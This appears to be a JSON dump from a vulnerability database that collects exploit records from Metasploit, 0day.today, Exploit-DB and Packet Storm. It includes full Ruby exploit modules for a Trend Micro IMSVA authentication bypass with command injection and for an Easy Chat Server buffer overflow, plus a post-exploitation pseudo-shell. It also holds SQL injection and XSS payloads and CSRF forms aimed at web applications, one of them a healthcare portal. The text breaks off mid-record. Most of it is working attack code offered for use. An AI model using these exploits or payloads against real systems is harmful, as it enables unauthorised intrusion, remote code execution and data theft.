"https://github.com/rapid7/metasploit-framework/blob/master//modules/post/linux/manage/iptables_removal.rb"}, {"lastseen": 
"2019-10-22T12:04:47", "bulletinFamily": "exploit", "description": "This module will run a Pseudo-Shell.\n", "modified": "2019-01-24T17:22:19", "published": "2018-06-19T10:39:41", "id": "MSF:POST/LINUX/MANAGE/PSEUDO_SHELL", "href": "", "type": "metasploit", "title": "Pseudo-Shell Post-Exploitation Module", "sourceData": "\n##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'readline'\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::File\n include Msf::Post::Unix\n include Msf::Post::Linux::System\n include Msf::Post::Linux::Priv\n\nHELP_COMMANDS = [[\"help\", \"help\", 0, \"Show current help\"],\n [\"?\", \"help\", 0, \"Show current help\"],\n [\"ls\", \"dir\", 1, \"List files and folders in a directory\"],\n [\"cat\", \"read_file\", 1, \"Show file contents\"],\n [\"whoami\", \"whoami\", 0, \"Show current user\"],\n [\"cd\", \"cd\", 1, \"Change current directory\"],\n [\"users\", \"get_users\", 0, \"Show list of users\"],\n [\"groups\", \"get_groups\", 0, \"Show list of groups\"],\n [\"pwd\", \"pwd\", 0, \"Show current PATH\"],\n [\"interfaces\", \"interfaces\", 0, \"Show list of network interfaces\"],\n [\"path\", \"get_path\", 0, \"Show current directories included in $PATH enviroment variable\"],\n [\"macs\", \"macs\", 0, \"Show list of MAC addresses\"],\n [\"shell\", \"get_shell_name\", 0, \"Show current SHELL\"],\n [\"hostname\", \"get_hostname\", 0, \"Show current Hostname\"],\n [\"ips\", \"ips\", 0, \"Show list of current IP addresses\"],\n [\"isroot?\", \"is_root?\", 0, \"Show if current user has root permisions\"],\n [\"exit\", \"\", 0, \"Exit the Pseudo-shell\"],\n [\"tcp_ports\", \"listen_tcp_ports\", 0, \"Show list of listen TCP ports\"],\n [\"udp_ports\", \"listen_udp_ports\", 0, \"Show list of listen UDP ports\"],\n [\"clear\", \"clear_screen\", 0, \"Clear screen\"]].sort\n\nLIST = [].sort\nHELP_COMMANDS.each do |linea|\n LIST.insert(-1, 
linea[0])\nend\n\n def initialize\n super(\n 'Name' => 'Pseudo-Shell Post-Exploitation Module',\n 'Description' => %q{\n This module will run a Pseudo-Shell.\n },\n 'Author' => 'Alberto Rafael Rodriguez Iglesias <albertocysec[at]gmail.com>',\n 'License' => MSF_LICENSE,\n 'Platform' => ['linux'],\n 'SessionTypes' => ['shell', 'meterpreter']\n )\n end\n\n def run\n @vhostname = get_hostname\n @vusername = whoami\n @vpromptchar = is_root? ? '#' : '$'\n prompt()\n end\n\n def parse_cmd(cmd)\n parts = cmd.split(' ')\n return '' unless parts.length >= 1\n cmd = parts[0]\n nargs = parts.length - 1\n HELP_COMMANDS.each do |linea|\n next unless linea[0] == cmd\n\n func = linea[1]\n if nargs >= 1\n if linea[2] == 1\n args = parts[1]\n else\n nargs = 0\n end\n else\n args = ''\n end\n\n return func, cmd, args, nargs\n end\n\n error = get_shell_name\n message = \"#{error}: #{cmd}: Command does not exist\\n\"\n print message\n message\n end\n\n def help()\n print \"\\n\"\n print \"Commands Help\\n\"\n print \"==============\\n\"\n print \"\\n\"\n printf(\"\\t%-20s%-100s\\n\", \"Command\", \"Description\")\n printf(\"\\t%-20s%-100s\\n\", \"-------\", \"-----------\")\n HELP_COMMANDS.each do |linea|\n printf(\"\\t%-20s%-100s\\n\", linea[0], linea[3])\n end\n print \"\\n\"\n end\n\n def prompt_show()\n promptshell = \"#{@vusername}@#{@vhostname}:#{pwd.strip}#{@vpromptchar} \"\n comp = proc { |s| LIST.grep(/^#{Regexp.escape(s)}/) }\n Readline.completion_append_character = \" \"\n Readline.completion_proc = comp\n input = Readline.readline(promptshell , true)\n return nil if input.nil?\n input\n end\n\n def prompt()\n while input = prompt_show\n break if input == \"exit\"\n break if input == \"exit \"\n begin\n func, command, args, nargs = parse_cmd(input)\n nargs = nargs.to_i\n if command == \"ls\"\n if nargs == 0\n nargs = nargs + 1\n ruta = pwd\n args = ruta\n end\n end\n if nargs > 0\n args = args.strip()\n resultado = public_send(\"#{func}\", \"#{args}\")\n else\n if input == 
\"\"\n resultado = []\n resultado.insert(-1,\"\")\n else\n resultado = public_send(\"#{func}\")\n end\n end\n if !!resultado == resultado\n if command == \"isroot?\"\n print resultado ? \"true\\n\" : \"false\\n\"\n end\n else\n if resultado.class == Array\n print resultado.join(\"\\n\")\n print \"\\n\"\n else\n if resultado.strip() != \"\"\n print resultado.chomp() + \"\\n\"\n end\n end\n end\n rescue # begin\n next\n end # begin\n end\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/post/linux/manage/pseudo_shell.rb"}, {"lastseen": "2019-11-21T22:51:13", "bulletinFamily": "exploit", "description": "This module exploits the authentication bypass and command injection vulnerability together. Unauthenticated users can execute a terminal command under the context of the web server user. The specific flaw exists within the management interface, which listens on TCP port 443 by default. Trend Micro IMSVA product have widget feature which is implemented with PHP. Insecurely configured web server exposes diagnostic.log file, which leads to an extraction of JSESSIONID value from administrator session. Proxy.php files under the mod TMCSS folder takes multiple parameter but the process does not properly validate a user-supplied string before using it to execute a system call. 
Due to combination of these vulnerabilities, unauthenticated users can execute a terminal command under the context of the web server user.\n", "modified": "2019-08-15T23:10:44", "published": "2017-10-08T15:15:32", "id": "MSF:EXPLOIT/LINUX/HTTP/TRENDMICRO_IMSVA_WIDGET_EXEC", "href": "", "type": "metasploit", "title": "Trend Micro InterScan Messaging Security (Virtual Appliance) Remote Code Execution", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Trend Micro InterScan Messaging Security (Virtual Appliance) Remote Code Execution\",\n 'Description' => %q{\n This module exploits the authentication bypass and command injection vulnerability together. Unauthenticated users can execute a\n terminal command under the context of the web server user.\n\n The specific flaw exists within the management interface, which listens on TCP port 443 by default. Trend Micro IMSVA product\n have widget feature which is implemented with PHP. Insecurely configured web server exposes diagnostic.log file, which\n leads to an extraction of JSESSIONID value from administrator session. Proxy.php files under the mod TMCSS folder takes multiple parameter but the process\n does not properly validate a user-supplied string before using it to execute a system call. 
Due to combination of these vulnerabilities,\n unauthenticated users can execute a terminal command under the context of the web server user.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'mr_me <mr_me@offensive-security.com>', # author of command injection\n 'Mehmet Ince <mehmet@mehmetince.net>' # author of authentication bypass & msf module\n ],\n 'References' =>\n [\n ['URL', 'https://pentest.blog/one-ring-to-rule-them-all-same-rce-on-multiple-trend-micro-products/'],\n ['URL', 'http://www.zerodayinitiative.com/advisories/ZDI-17-521/'],\n ],\n 'DefaultOptions' =>\n {\n 'SSL' => true,\n 'RPORT' => 8445\n },\n 'Payload' =>\n {\n 'Compat' =>\n {\n 'ConnectionType' => '-bind'\n },\n },\n 'Platform' => ['python'],\n 'Arch' => ARCH_PYTHON,\n 'Targets' => [[ 'Automatic', {}]],\n 'Privileged' => false,\n 'DisclosureDate' => \"Oct 7 2017\",\n 'DefaultTarget' => 0\n ))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The URI of the Trend Micro IMSVA management interface', '/'])\n ]\n )\n end\n\n def extract_jsessionid\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, 'widget', 'repository', 'log', 'diagnostic.log')\n })\n if res && res.code == 200 && res.body.include?('JSEEEIONID')\n res.body.scan(/JSEEEIONID:([A-F0-9]{32})/).flatten.last\n else\n nil\n end\n end\n\n def widget_auth(jsessionid)\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, 'widget', 'index.php'),\n 'cookie' => \"CurrentLocale=en-U=en_US; JSESSIONID=#{jsessionid}\"\n })\n if res && res.code == 200 && res.body.include?('USER_GENERATED_WIDGET_DIR')\n res.get_cookies\n else\n nil\n end\n end\n\n def check\n # If we've managed to bypass authentication, that means target is most likely vulnerable.\n jsessionid = extract_jsessionid\n if jsessionid.nil?\n return Exploit::CheckCode::Safe\n end\n auth = widget_auth(jsessionid)\n if auth.nil?\n Exploit::CheckCode::Safe\n else\n Exploit::CheckCode::Appears\n end\n 
end\n\n def exploit\n print_status('Extracting JSESSIONID from publicly accessible log file')\n jsessionid = extract_jsessionid\n if jsessionid.nil?\n fail_with(Failure::NotVulnerable, \"Target is not vulnerable.\")\n else\n print_good(\"Awesome. JSESSIONID value = #{jsessionid}\")\n end\n\n print_status('Initiating session with widget framework')\n cookies = widget_auth(jsessionid)\n if cookies.nil?\n fail_with(Failure::NoAccess, \"Latest JSESSIONID is expired. Wait for sysadmin to login IMSVA\")\n else\n print_good('Session with widget framework successfully initiated.')\n end\n\n print_status('Trigerring command injection vulnerability')\n send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'widget', 'proxy_controller.php'),\n 'cookie' => \"CurrentLocale=en-US; LogonUser=root; JSESSIONID=#{jsessionid}; #{cookies}\",\n 'vars_post' => {\n 'module' => 'modTMCSS',\n 'serverid' => '1',\n 'TOP' => \"$(python -c \\\"#{payload.encoded}\\\")\"\n }\n })\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/trendmicro_imsva_widget_exec.rb"}, {"lastseen": "2019-12-06T03:17:57", "bulletinFamily": "exploit", "description": "This module exploits a buffer overflow during user registration in Easy Chat Server software.\n", "modified": "2017-07-24T13:26:21", "published": "2017-06-19T22:36:59", "id": "MSF:EXPLOIT/WINDOWS/HTTP/EASYCHATSERVER_SEH", "href": "", "type": "metasploit", "title": "Easy Chat Server User Registeration Buffer Overflow (SEH)", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Easy Chat Server User Registeration Buffer Overflow (SEH)',\n 
'Description' => %q{\n This module exploits a buffer overflow during user registration in Easy Chat Server software.\n },\n 'Author' =>\n [\n 'Marco Rivoli', #Metasploit\n 'Aitezaz Mohsin' #POC\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '42155' ],\n ],\n 'Privileged' => true,\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\\x7e\\x2b\\x26\\x3d\\x25\\x3a\\x22\\x0a\\x0d\\x20\\x2f\\x5c\\x2e\",\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Easy Chat Server 2.0 to 3.1', { 'Ret' => 0x100104bc } ],\n ],\n 'DefaultOptions' => {\n 'RPORT' => 80,\n 'EXITFUNC' => 'thread',\n 'ENCODER' => 'x86/alpha_mixed'\n },\n 'DisclosureDate' => 'Oct 09 2017',\n 'DefaultTarget' => 0))\n end\n\n def exploit\n sploit = rand_text_alpha_upper(217)\n sploit << \"\\xeb\\x06\\x90\\x90\"\n sploit << [target.ret].pack('V')\n sploit << payload.encoded\n sploit << rand_text_alpha_upper(200)\n\n res = send_request_cgi({\n 'uri' => normalize_uri(URI,'registresult.htm'),\n 'method' => 'POST',\n 'vars_post' => {\n 'UserName' => sploit,\n 'Password' => 'test',\n 'Password1' => 'test',\n 'Sex' => 1,\n 'Email' => 'x@',\n 'Icon' => 'x.gif',\n 'Resume' => 'xxxx',\n 'cw' => 1,\n 'RoomID' => 4,\n 'RepUserName' => 'admin',\n 'submit1' => 'Register'\n }\n })\n handler\n\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/http/easychatserver_seh.rb"}], "zdt": [{"lastseen": "2018-01-04T11:06:36", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2017-01-26T00:00:00", "published": "2017-01-26T00:00:00", "href": "https://0day.today/exploit/description/26798", "id": "1337DAY-ID-26798", "title": "Movie Portal Script 7.36 - Multiple Vulnerabilities", "type": "zdt", "sourceData": "Exploit Title : Movie Portal Script v7.36 - Multiple Vulnerability\r\nGoogle Dork : -\r\nDate : 20/01/2017\r\nExploit Author : Marc Castejon 
<[email\u00a0protected]>\r\nVendor Homepage : http://itechscripts.com/movie-portal-script/\r\nSoftware Link: http://movie-portal.itechscripts.com\r\nType : webapps\r\nPlatform: PHP\r\nSofware Price and Demo : $250\r\n \r\n------------------------------------------------\r\nType: Error Based Sql Injection\r\nVulnerable URL:http://localhost/[PATH]/show_news.php\r\nVulnerable Parameters: id\r\nMethod: GET\r\nPayload: AND (SELECT 1222 FROM(SELECT COUNT(*),CONCAT(0x71786b7a71,(SELECT\r\n(ELT(1222=1222,1))),0x717a627871,FLOOR(RAND(0)*2))x FROM\r\nINFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)\r\n \r\n-----------------------------------------------\r\nType: Reflected XSS\r\nVulnerable URL: http://localhost/[PATH]/movie.php\r\nVulnerable Parameters : f=\r\nPayload:<img src=i onerror=prompt(1)>\r\n---------------------------------------------\r\nType: Error Based Sql Injection\r\nVulnerable URL:http://localhost/[PATH]/show_misc_video.php\r\nVulnerable Parameters: id\r\nMethod: GET\r\nPayload: AND (SELECT 1222 FROM(SELECT COUNT(*),CONCAT(0x71786b7a71,(SELECT\r\n(ELT(1222=1222,1))),0x717a627871,FLOOR(RAND(0)*2))x FROM\r\nINFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)\r\n-----------------------------------------------\r\n \r\nType:Union Query Sql Injection\r\nVulnerable URL:http://localhost/[PATH]/movie.php\r\nVulnerable Parameters: f\r\nMethod: GET\r\nPayload: -4594 UNION ALL SELECT\r\nNULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71626a7871,0x6452766b715a73727a634a497a7370474e6744576c737a6a436a6e566e546c68425a4b426a53544d,0x71627a7171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#\r\n-----------------------------------------------\r\nType: Union Query Sql Injection\r\nVulnerable URL:http://localhost/[PATH]/artist-display.php\r\nVulnerable Parameters: act\r\nMethod: GET\r\nPayload: UNION ALL 
SELECT\r\nNULL,CONCAT(0x71706a7871,0x6b704f42447249656672596d4851736d486b45414a53714158786549644646716377666471545553,0x717a6a7a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#\r\n-----------------------------------------------\r\n \r\nType: Error Based Sql Injection\r\nVulnerable URL:http://localhost/[PATH]/film-rating.php\r\nVulnerable Parameters: v\r\nMethod: GET\r\nPayload: AND (SELECT 1222 FROM(SELECT COUNT(*),CONCAT(0x71786b7a71,(SELECT\r\n(ELT(1222=1222,1))),0x717a627871,FLOOR(RAND(0)*2))x FROM\r\nINFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)\n\n# 0day.today [2018-01-04] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/26798"}, {"lastseen": "2018-01-05T15:26:49", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2016-02-02T00:00:00", "published": "2016-02-02T00:00:00", "id": "1337DAY-ID-24887", "href": "https://0day.today/exploit/description/24887", "type": "zdt", "title": "eClinicalWorks (CCMR) - Multiple Vulnerabilities", "sourceData": "# Title: eClinicalWorks (CCMR) - Multiple Vulnerabilities\r\n# Vendor: https://www.eclinicalworks.com\r\n# Product: eClinicalWorks Population Health (CCMR) Client Portal Software \r\n# URL: https://www.eclinicalworks.com/products-services/population-health-ccmr/\r\n# Credit: Jerold Hoong\r\n \r\n-------------------------------------\r\n \r\n# CVE-2015-4591 CROSS-SITE SCRIPTING\r\nCross-site scripting (XSS) vulnerability in login.jsp in eClinicalWorks Population\r\nHealth (CCMR) Client Portal Software allows remote authenticated users to inject\r\narbitrary javascript via the strMessage parameter.\r\n \r\nhttps://127.0.0.1/mobiledoc/jsp/ccmr/clientPortal/login.jsp?strMessage=\r\n%3Cimg%20src=/%20onerror=%22alert%28document.cookie%29%22/%3E\r\n \r\n-------------------------------------\r\n \r\n# CVE-2015-4592 SQL INJECTION\r\nSQL injection vulnerability in portalUserService.jsp in eClinicalWorks Population\r\nHealth (CCMR) 
Client Portal Software allows remote authenticated users to inject\r\narbitrary malicious database commands as part of user input.\r\n \r\nParameter: uemail (POST PARAMETER)\r\nType: stacked queries\r\nTitle: Microsoft SQL Server/Sybase stacked queries (comment)\r\nPayload: action=updatePersonalInfo&ufname=john&ulname=doe&upaddress=&upcity=&upstate=\r\n&zipcode=&[email\u00a0protected]';WAITFOR DELAY '0:0:5'--&upphone=0&umobileno=\r\n \r\nPOST /mobiledoc/jsp/ccmr/clientPortal/admin/service/portalUserService.jsp HTTP/1.1\r\nHost: 127.0.0.1:443\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0\r\nAccept: application/json, text/javascript, */*; q=0.01\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nContent-Type: application/x-www-form-urlencoded\r\nX-Requested-With: XMLHttpRequest\r\nReferer: https://127.0.0.1/mobiledoc/jsp/ccmr/clientPortal/dashBoard.jsp\r\nContent-Length: 186\r\n[SNIP] ...\r\nConnection: keep-alive\r\nPragma: no-cache\r\nCache-Control: no-cache\r\n[SNIP] ...\r\n \r\naction=updatePersonalInfo&ufname=john&ulname=doe&upaddress=&upcity=&upstate=\r\n&zipcode=&[email\u00a0protected]';WAITFOR DELAY '0:0:5'--&upphone=0&umobileno=\r\n \r\n-------------------------------------\r\n \r\n# CVE-2015-4593 CROSS-SITE REQUEST FORGERY\r\nCross-site request forgery (CSRF) vulnerability in portalUserService.jsp in eClinicalWorks \r\nClient Portal allows remote attackers to hijack the authentication of content administrators\r\nfor requests that could lead to the creation, modification and deletion of users, appointments\r\nand employees.\r\n \r\n# ADDING OF USER\r\n<html>\r\n <body>\r\n <form action=\"https://127.0.0.1/mobiledoc/jsp/ccmr/clientPortal/admin/service/portalUserService.jsp\" method=\"POST\">\r\n <input type=\"hidden\" name=\"action\" value=\"add\" />\r\n <input type=\"hidden\" name=\"uid\" value=\"0\" />\r\n <input type=\"hidden\" name=\"createdOver\" value=\"1\" />\r\n <input type=\"hidden\" 
name=\"ufname\" value=\"John\" />\r\n <input type=\"hidden\" name=\"ulname\" value=\"Doe\" />\r\n <input type=\"hidden\" name=\"uminitial\" value=\"\" />\r\n <input type=\"hidden\" name=\"selUserType\" value=\"1\" />\r\n <input type=\"hidden\" name=\"status\" value=\"0\" />\r\n <input type=\"hidden\" name=\"upaddress\" value=\"\" />\r\n <input type=\"hidden\" name=\"upcity\" value=\"\" />\r\n <input type=\"hidden\" name=\"upstate\" value=\"\" />\r\n <input type=\"hidden\" name=\"zipcode\" value=\"\" />\r\n <input type=\"hidden\" name=\"uemail\" value=\"[email\u00a0protected]\" />\r\n <input type=\"hidden\" name=\"upphone\" value=\"98999299\" />\r\n <input type=\"hidden\" name=\"umobileno\" value=\"\" />\r\n <input type=\"submit\" value=\"Submit request\" />\r\n </form>\r\n </body>\r\n</html>\r\n \r\n-------------------------------------\r\n \r\n# CVE-2015-4594 SESSION FIXATION\r\nThe web application is vulnerable to session fixation attacks. When authenticating a user\r\nthe application does not assign a new session ID, making it possible to use an existent\r\nsession ID.\r\n \r\n-------------------------------------\r\n \r\n# TIMELINE\r\n\u2013 16/06/2015: Vulnerability found\r\n\u2013 16/06/2015: Vendor informed\r\n\u2013 16/06/2015: Request for CVE IDs\r\n- 16/06/2015: MITRE issued CVE numbers\r\n\u2013 16/06/2015: Vendor responded requesting more information on support contract etc\r\n- 21/06/2015: No support contract, vendor does not open case\r\n- 22/06/2015: Requested update from vendor, no response\r\n- 01/07/2015: Contacted vendor again, vendor requested for support contract again\r\n- 02/07/2015: No support contract, no response from vendor\r\n\u2013 31/01/2016: Public disclosure\n\n# 0day.today [2018-01-05] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/24887"}, {"lastseen": "2018-04-13T05:42:53", "bulletinFamily": "exploit", "description": "Exploit for php 
platform in category web applications", "modified": "2016-01-29T00:00:00", "published": "2016-01-29T00:00:00", "id": "1337DAY-ID-24882", "href": "https://0day.today/exploit/description/24882", "type": "zdt", "title": "WordPress Simple Add Pages or Posts 1.6 Plugin - Cross-Site Request Forgery", "sourceData": "########################################################################\r\n# Exploit Title: Wordpress simple add pages or posts CSRF Vulnerability\r\n# Date: 2016/29/01\r\n# Exploit Author: ALIREZA_PROMIS\r\n# Vendor Homepage: https://wordpress.org/plugins/simple-add-pages-or-posts/\r\n# Software Link: https://downloads.wordpress.org/plugin/simple-add-pages-or-posts.1.6.zip\r\n# Version: 1.6\r\n# Tested on: ubuntu / FireFox\r\n########################################################################\r\n \r\n[Exploitation]\r\nhttps://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29\r\n \r\n[HTML CODE ]\r\n<form id=\"form1\" name=\"form1\" method=\"post\" action=\"http://site.com/wp-admin/plugins.php?page=simple-add-pages-or-posts%2Fsimple_add_pages_or_posts.php\"\r\n<select name=\"postorpage\">\r\n<option value=\"page\">Page</option>\r\n<option value=\"post\">Post</option>\r\n</select>\r\n<td colspan=\"2\"><select name='post_parent' id='post_parent'>\r\n<option value=\"\">No, do not use parent</option>\r\n<option class=\"level-0\" value=\"2\">Sample Page</option>\r\n</select>\r\n<tr class=\"alternate iedit\">\r\n<textarea name=\"titles\" rows=\"1\" cols=\"30\"></textarea>\r\n<tr class=\"iedit\">\r\n<td colspan=\"2\"><select name=\"author_id\">\r\n<option value=\"1\">admin</option></select>\r\n<input type=\"submit\" name=\"submitbutton\" value=\"Add\" class=\"button-primary\"></form>\r\n \r\n \r\n \r\nand live POST request :\r\npostorpage=page&post_parent=2&titles=TEST_CSRF&author_id=1&submitbutton=Add\r\n \r\n \r\n########################################################################\r\n# Friends : ali ahmady , Mr.Moein , sheytan azzam , 
Mr.PERSIA , H3llBoy.Blackhat , Amir , Jok3r\r\n# Sajjad Sotoudeh , security , Kamran Helish , Dr.RooT , Milad Inj3ctor , Mr.Turk\r\n#\r\n# [+] fb.com/alirezapomis.blackhat\r\n########################################################################\n\n# 0day.today [2018-04-13] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/24882"}], "cve": [{"lastseen": "2019-05-29T18:14:42", "bulletinFamily": "NVD", "description": "eClinicalWorks Population Health (CCMR) suffers from a session fixation vulnerability. When authenticating a user, the application does not assign a new session ID, making it possible to use an existent session ID.", "modified": "2019-03-13T18:59:00", "id": "CVE-2015-4594", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4594", "published": "2017-01-10T15:59:00", "title": "CVE-2015-4594", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2016-02-04T10:03:03", "bulletinFamily": "exploit", "description": "eClinicalWorks (CCMR) - Multiple Vulnerabilities. CVE-2015-4591,CVE-2015-4592,CVE-2015-4593,CVE-2015-4594. 
Webapps exploit for jsp platform", "modified": "2016-02-02T00:00:00", "published": "2016-02-02T00:00:00", "id": "EDB-ID:39402", "href": "https://www.exploit-db.com/exploits/39402/", "type": "exploitdb", "title": "eClinicalWorks CCMR - Multiple Vulnerabilities", "sourceData": "# Title: eClinicalWorks (CCMR) - Multiple Vulnerabilities\r\n# Vendor: https://www.eclinicalworks.com\r\n# Product: eClinicalWorks Population Health (CCMR) Client Portal Software \r\n# URL: https://www.eclinicalworks.com/products-services/population-health-ccmr/\r\n# Credit: Jerold Hoong\r\n\r\n-------------------------------------\r\n\r\n# CVE-2015-4591 CROSS-SITE SCRIPTING\r\nCross-site scripting (XSS) vulnerability in login.jsp in eClinicalWorks Population\r\nHealth (CCMR) Client Portal Software allows remote authenticated users to inject\r\narbitrary javascript via the strMessage parameter.\r\n\r\nhttps://127.0.0.1/mobiledoc/jsp/ccmr/clientPortal/login.jsp?strMessage=\r\n%3Cimg%20src=/%20onerror=%22alert%28document.cookie%29%22/%3E\r\n\r\n-------------------------------------\r\n\r\n# CVE-2015-4592 SQL INJECTION\r\nSQL injection vulnerability in portalUserService.jsp in eClinicalWorks Population\r\nHealth (CCMR) Client Portal Software allows remote authenticated users to inject\r\narbitrary malicious database commands as part of user input.\r\n\r\nParameter: uemail (POST PARAMETER)\r\nType: stacked queries\r\nTitle: Microsoft SQL Server/Sybase stacked queries (comment)\r\nPayload: action=updatePersonalInfo&ufname=john&ulname=doe&upaddress=&upcity=&upstate=\r\n&zipcode=&uemail=john.doe@test.com';WAITFOR DELAY '0:0:5'--&upphone=0&umobileno=\r\n\r\nPOST /mobiledoc/jsp/ccmr/clientPortal/admin/service/portalUserService.jsp HTTP/1.1\r\nHost: 127.0.0.1:443\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0\r\nAccept: application/json, text/javascript, */*; q=0.01\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nContent-Type: 
application/x-www-form-urlencoded\r\nX-Requested-With: XMLHttpRequest\r\nReferer: https://127.0.0.1/mobiledoc/jsp/ccmr/clientPortal/dashBoard.jsp\r\nContent-Length: 186\r\n[SNIP] ...\r\nConnection: keep-alive\r\nPragma: no-cache\r\nCache-Control: no-cache\r\n[SNIP] ...\r\n\r\naction=updatePersonalInfo&ufname=john&ulname=doe&upaddress=&upcity=&upstate=\r\n&zipcode=&uemail=john.doe@test.com';WAITFOR DELAY '0:0:5'--&upphone=0&umobileno=\r\n\r\n-------------------------------------\r\n\r\n# CVE-2015-4593 CROSS-SITE REQUEST FORGERY\r\nCross-site request forgery (CSRF) vulnerability in portalUserService.jsp in eClinicalWorks \r\nClient Portal allows remote attackers to hijack the authentication of content administrators\r\nfor requests that could lead to the creation, modification and deletion of users, appointments\r\nand employees.\r\n\r\n# ADDING OF USER\r\n<html>\r\n <body>\r\n <form action=\"https://127.0.0.1/mobiledoc/jsp/ccmr/clientPortal/admin/service/portalUserService.jsp\" method=\"POST\">\r\n <input type=\"hidden\" name=\"action\" value=\"add\" />\r\n <input type=\"hidden\" name=\"uid\" value=\"0\" />\r\n <input type=\"hidden\" name=\"createdOver\" value=\"1\" />\r\n <input type=\"hidden\" name=\"ufname\" value=\"John\" />\r\n <input type=\"hidden\" name=\"ulname\" value=\"Doe\" />\r\n <input type=\"hidden\" name=\"uminitial\" value=\"\" />\r\n <input type=\"hidden\" name=\"selUserType\" value=\"1\" />\r\n <input type=\"hidden\" name=\"status\" value=\"0\" />\r\n <input type=\"hidden\" name=\"upaddress\" value=\"\" />\r\n <input type=\"hidden\" name=\"upcity\" value=\"\" />\r\n <input type=\"hidden\" name=\"upstate\" value=\"\" />\r\n <input type=\"hidden\" name=\"zipcode\" value=\"\" />\r\n <input type=\"hidden\" name=\"uemail\" value=\"johndoe@test.com.de\" />\r\n <input type=\"hidden\" name=\"upphone\" value=\"98999299\" />\r\n <input type=\"hidden\" name=\"umobileno\" value=\"\" />\r\n <input type=\"submit\" value=\"Submit request\" />\r\n </form>\r\n 
</body>\r\n</html>\r\n\r\n-------------------------------------\r\n\r\n# CVE-2015-4594 SESSION FIXATION\r\nThe web application is vulnerable to session fixation attacks. When authenticating a user\r\nthe application does not assign a new session ID, making it possible to use an existent\r\nsession ID.\r\n\r\n-------------------------------------\r\n\r\n# TIMELINE\r\n\u2013 16/06/2015: Vulnerability found\r\n\u2013 16/06/2015: Vendor informed\r\n\u2013 16/06/2015: Request for CVE IDs\r\n- 16/06/2015: MITRE issued CVE numbers\r\n\u2013 16/06/2015: Vendor responded requesting more information on support contract etc\r\n- 21/06/2015: No support contract, vendor does not open case\r\n- 22/06/2015: Requested update from vendor, no response\r\n- 01/07/2015: Contacted vendor again, vendor requested for support contract again\r\n- 02/07/2015: No support contract, no response from vendor\r\n\u2013 31/01/2016: Public disclosure", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/39402/"}], "packetstorm": [{"lastseen": "2016-12-05T22:19:58", "bulletinFamily": "exploit", "description": "", "modified": "2016-02-01T00:00:00", "published": "2016-02-01T00:00:00", "href": "https://packetstormsecurity.com/files/135533/eClinicalWorks-Population-Health-CCMR-SQL-Injection-CSRF-XSS.html", "id": "PACKETSTORM:135533", "title": "eClinicalWorks Population Health (CCMR) SQL Injection / CSRF / XSS", "type": "packetstorm", "sourceData": "`# Title: eClinicalWorks (CCMR) - Multiple Vulnerabilities \n# Vendor: https://www.eclinicalworks.com \n# Product: eClinicalWorks Population Health (CCMR) Client Portal Software \n# URL: https://www.eclinicalworks.com/products-services/population-health-ccmr/ \n# Credit: Jerold Hoong \n \n------------------------------------- \n \n# CVE-2015-4591 CROSS-SITE SCRIPTING \nCross-site scripting (XSS) vulnerability in login.jsp in eClinicalWorks Population \nHealth (CCMR) Client Portal Software allows remote authenticated 
